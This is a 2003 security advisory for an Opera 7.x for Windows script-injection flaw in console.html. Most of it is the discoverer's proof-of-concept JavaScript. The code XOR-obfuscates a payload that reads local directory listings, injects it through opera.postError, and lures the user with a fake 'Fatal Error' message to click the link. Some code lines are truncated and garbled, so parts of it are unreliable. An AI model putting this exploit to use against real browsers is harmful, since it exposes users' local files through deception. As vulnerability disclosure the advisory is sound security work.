Reported April 28, 2003, by nesumin.

 

 

VERSIONS AFFECTED

 

  • Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651)

 

DESCRIPTION

 

<span style="font-family:Verdana">A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone. This vulnerability is a result of code in Opera 7.x's console.html file that doesn't sanitize the single quotation mark. The flaw permits a malicious intruder to inject an arbitrary script into the link on the Microsoft JavaScript console.</h3> <span style="font-family:Verdana"> </h3>

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

==============

 

  This code generates a link on the JavaScript console

  to read directory list from local disk "C:\" and display it.

 

  \[1\] replace the "script" instead of "Xploit" and save as html file

  \[2\] upload to WEB server

  \[3\] open with Opera(enable javascript)

  \[4\] click a link on the JavaScript console

 

    ----------------------------------------------------------------

   

    var depth = 1;

    var startdir = "file://localhost/c:/";

 

    // arbitrary script

    var evil_script="";

    evil_script += "function dt(dp)\{\n";

    evil_script += "var i,j,tr,td,b;\n";

    evil_script += "if('complete'fr.document.readyState&&";

    evil_script += "fr.document.getElementsByTagName('base').item(0))\{\n";

    evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='


\\n'";

    evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";

    evil_script += "b+='
\\n'+'Count : '+tr.length+'
\\n';\n";

    evil_script += "for(i=1;i

    evil_script += "td = tr.item(i).getElementsByTagName('td');\n";

    evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";

    evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";

    evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";

    evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";

    evil_script += "for (j=0;j

    evil_script += "b+='
\\n';\}tree.innerHTML+=b;\n";

    evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;\}\n";

    evil_script += "setTimeout('dt('+dp+');',30);\}\nvar ds = new Array(),";

    evil_script += "b = document.getElementsByTagName('body').item(0),";

    evil_script += "f = document.createElement('iframe'),";

    evil_script += "d = document.createElement('div');\n";

    evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";

    evil_script += "f.style.width=f.style.height=f.style.border=0;\n";

    evil_script += "f.setAttribute('src','"+startdir+"');\n";

    evil_script += "f.setAttribute('id','fr');\n";

    evil_script += "b.appendChild(f);\n";

    evil_script += "dt("+depth+");\n";

 

    // xor and URLEncode

    evil_script = escape(evil_script.replace(/./g,function(s)\{

        return(String.fromCharCode(0x80^s.charCodeAt(0)))\}));

 

    var msg = "http://";

 

    // fake url

    msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";

 

    // code

    msg += "');m='";

    msg += evil_script;

    msg += "';eval(unescape(m).replace(/./g,function(s)\{";

    msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))\})+'\n";

 

    // fake message

    msg += "\n";

    msg += "Fatal Error !!!!\n\n";

    msg += "  Please click above link.\n"; // :p

 

    opera.postError(msg);

    //window.open("file://localhost/console.html","","");

    location.href = "file://localhost/console.html";

 

   

    ----------------------------------------------------------------

 

VENDOR RESPONSE

 

<span style="font-family:Verdana"><a href="http://www.opera.com/" style="color: blue; text-decoration: underline; text-underline: single">Opera</a> has yet to respond to this problem.</h3>

 

CREDIT                                                                                                       
Discovered by nesumin.